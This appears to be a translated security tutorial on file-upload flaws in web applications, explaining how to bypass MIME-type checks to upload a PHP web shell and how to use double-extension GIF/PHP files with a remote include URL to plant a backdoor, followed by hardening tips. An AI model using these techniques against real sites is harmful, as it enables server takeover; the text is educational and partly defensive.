Last updated: July 16, 2022
The Upload script allows the transfer of files from your machine which is the client to the site which is the server, but often the upload script contains vulnerabilities.
La upload flaw is a flaw allowing to upload files with an unauthorized extension, this flaw is due to the incorrect configuration of the upload script or to the complete lack of security. This is generally present in image upload scripts. It is one of the most dangerous loopholes.
How does the Upload flaw work?
The goal of this flaw is to upload a file with an unauthorized extension. (For example a php code) so as to have access to the target server. If the upload form of your site is not secure, then a hacker could easily have fun uploading a malicious PHP file (web shell for example) which would allow him to take total control of your web application, and your server.
How could a hacker exploit the Upload flaw?
In this part, I will explain the different ways to exploit the Upload flaw.
1) Bypass MIME verification
The MIME type of a file is the type of content that a file is made up of. For example, the MIME type of gif images is "image / gif" and the MIME type of jpg images is "image / jpeg"
Some Upload scripts only check if the MIME corresponds to the authorized file types, on the other hand a mime check is not sufficient because a hacker can bypass this check
A malicious user can bypass this check. It can upload a PHP file by tricking the server into believing the file is a JPEG image.
Here's how to do it:
- Download Firefox
- Download Tamper Data
- Open a vulnerable site that contains an uplod script
- Start Tamper Data
- Start alteration
To start the alteration, open Firefox then click on "tools" then on "alter data" and finally "start alteration".
- Now select a php file you want to uplode on the vulnerable server and click on uploder.
- A new window opens, click on Alter
- You have the "header". Now in POST_DATA, change "application / octet-stream" to "image / jpg" then click on OK and admire the result.
The Shell has been uploaded successfully! It passed for a JPEG image.
The hacker can now execute the PHP file with the URL address of the latter.
2) Double extension
Some scripts only check the file extension, yet this protection can be bypassed by a hacker by making a double extension (depending on the host).
- We will first create a GIF file. To do this, open the Paint program, create an image of a few pixels.
- Then we open our GIG file with a hex editor (for me Freed, it's the best).
- Now imagine that we insert PHP code in our GIF and that we give it a double extension (.php.gif).
- In our editor, there is an empty space to add an html header as well as the include function.
- So we end up with our file.php.gif.
- We upload it, and now the upload is happening correctly.
- We go to our file.php.gif? Test = http: //www.sitepirate.com/backdoor.php. And so here is our backdoor is put in place.
Upload security
Here are some tips that will help you secure this vulnerability:
- Never trust what the customer can send.
- Check the Apache configuration in order to act accordingly.
- Do not put the .htaccess in the upload directory.
- Do not allow file overwriting.
- Generate a random name for the uploaded file and save the name in a database.
- Do not allow to see the index of the upload directory.
- Assign the correct permissions to the directory.
- Check the mime-type with getimagesize () and the file extension.